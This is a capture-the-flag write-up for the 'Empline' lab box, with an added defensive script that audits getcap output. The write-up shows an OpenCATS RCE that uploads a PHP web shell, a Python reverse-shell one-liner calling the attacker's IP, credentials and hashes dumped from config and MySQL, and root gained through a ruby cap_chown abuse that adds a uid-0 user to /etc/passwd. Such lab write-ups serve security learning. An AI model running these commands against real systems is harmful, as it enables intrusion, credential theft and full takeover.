# CTF: Empline

## Information

- IP: 10.10.241.5
- MYIP: 10.8.16.133

## First enumeration

### Basics

- NMAP
```console
$ sudo nmap -p- 10.10.241.5
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-29 22:26 CET
Nmap scan report for 10.10.241.5
Host is up (0.042s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
```
### Vulnerabilities search

On the website there was a link that goes to job.empline.thm

...

So I added it to my /etc/hosts.

http://job.empline.thm leads to an instance of opencats v0.9.4
```console
$ searchsploit opencats
-------------------------------------------------------------------------- ---------------------
 Exploit Title                                                            |  Path
-------------------------------------------------------------------------- ---------------------
OpenCATS 0.9.4 - Remote Code Execution (RCE)                              | php/webapps/50585.sh
OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)            | php/webapps/50316.py
-------------------------------------------------------------------------- ---------------------
```
Huuum an RCE... :)
## Exploit

```console
$ ./50585.sh http://job.empline.thm
                _._         _,-'""`-._
               (,-.`._,'(       |\`-/|   RevCAT - OpenCAT RCE
                   `-.-' \ )-`( , o o)   Nicholas Ferreira
                         `-    \`_`"'-   https://github.com/Nickguitar-e

[*] Attacking target http://job.empline.thm
[*] Checking CATS version...
-e [*] Version detected: 0.9.4
[*] Creating temp file with payload...
[*] Checking active jobs...
./50585.sh: 105: [[: not found
-e [+] Jobs found! Using job id 1
[*] Sending payload...
-e [+] Payload dCoqH.php uploaded!
[*] Deleting created temp file...
[*] Checking shell...
-e [+] Got shell! :D
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux empline 4.15.0-147-generic #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
-e
$ ls
dCoqH.php
```
We got a shell, but we couldn't use it freely, so I started a pwncat listener on the attacker box:

```shell
pwncat -lp 1234
```

And on the target:

```shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.16.133",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

And I got a full shell :)
## Privilege escalation

### Enumeration for privesc to george

I first tried to privesc to george.

In /var/www/opencats/config.php:

```php
/* Database configuration. */
define('DATABASE_USER', 'james');
define('DATABASE_PASS', 'nxxxxxxxxxxw');
define('DATABASE_HOST', 'localhost');
define('DATABASE_NAME', 'opencats');
```

We could use those creds to log in to mysql, as TCP port 3306 was open.

```console
mysql> select user_name,password from user;
+----------------+----------------------------------+
| user_name      | password                         |
+----------------+----------------------------------+
| admin          | b67xxxxxxxxxxxxxxxxxxxxxxxx053ec |
| cats@rootadmin | cantlogin                        |
| george         | 86xxxxxxxxxxxxxxxxxxxxxxxxxx56ac |
| james          | e5xxxxxxxxxxxxxxxxxxxxxxxxxxxxc9 |
+----------------+----------------------------------+
4 rows in set (0.03 sec)
```
### Exploit for privesc to george

I used crackstation to crack george's hash:

86xxxxxxxxxxxxxxxxxxxxxxxxxx56ac => pxxxxxxxxxxxxxxxxxxxxe

And I could use these creds to log in to the box as george through ssh.
### Enumeration for privesc to root

As I was enumerating I found that the ruby binary had a special capability:

```console
$ getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/local/bin/ruby = cap_chown+ep
```

It means that I could use ruby to change the ownership of any file :)
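As an added note on the defensive side (this is the editor's example, not part of the original writeup or of any tool used in it): a file capability such as cap_chown on a general-purpose interpreter is root-equivalent, and a periodic audit of `getcap -r /` output catches it. The script below parses both the older `path = caps+flags` format shown above and the newer libcap `path caps=flags` format, and flags binaries whose permitted or effective set contains a high-risk capability; the sample output and the risk list are constructed assumptions.

```python
import re

# Capabilities that let the holder change file ownership, bypass permission
# checks or change identity; on an interpreter any one of them is root-equivalent.
# (Editor's list, not an exhaustive or authoritative one.)
HIGH_RISK_CAPS = {
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
}

# One clause: comma-separated cap names, an operator (+ = -), then flag letters
# e (effective), p (permitted), i (inheritable), e.g. "cap_chown+ep".
CLAUSE = re.compile(r"^([a-z0-9_,]+)([+=-])([eip]*)$")

# Constructed sample: the two lines from the box above plus one in the newer format.
SAMPLE_GETCAP = """\
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/local/bin/ruby = cap_chown+ep
/usr/bin/ping cap_net_raw=ep
"""


def parse_getcap_line(line):
    """Return (path, {cap_name: set_of_flags}) for one getcap line, or None."""
    line = line.strip()
    if " = " in line:                 # libcap < 2.41: "path = clauses"
        path, spec = line.split(" = ", 1)
    else:                             # libcap >= 2.41: "path clauses"
        path, _, spec = line.partition(" ")
    if not path or not spec:
        return None
    caps = {}
    for clause in spec.split():
        m = CLAUSE.match(clause)
        if not m:
            return None
        if m.group(2) == "-":         # "-" removes flags; nothing is granted here
            continue
        for name in m.group(1).split(","):
            caps.setdefault(name, set()).update(m.group(3))
    return path, caps


def audit_getcap(output):
    """Return [(path, [risky caps])] for binaries granting a high-risk capability
    in their permitted or effective set. Remediation is `setcap -r <path>`."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        risky = sorted(c for c, f in caps.items() if c in HIGH_RISK_CAPS and f & {"e", "p"})
        if risky:
            findings.append((path, risky))
    return findings
```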
### Exploit

I found information on the ruby syntax here:

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities

I used this code to change the ownership of /etc/passwd, then appended a new root-level user:

```shell
ruby -e 'require "fileutils"; FileUtils.chown(1002, 1002, "/etc/passwd")'
echo 'toto:$1$toto$U3mQTcCvor57o7Hq2Woid.:0:0:root:/root:/bin/bash' >> /etc/passwd
```

Then:

```console
$ su - toto
Password:
root@empline:~# whoami
root
root@empline:~# cat /root/root.txt
```

\o/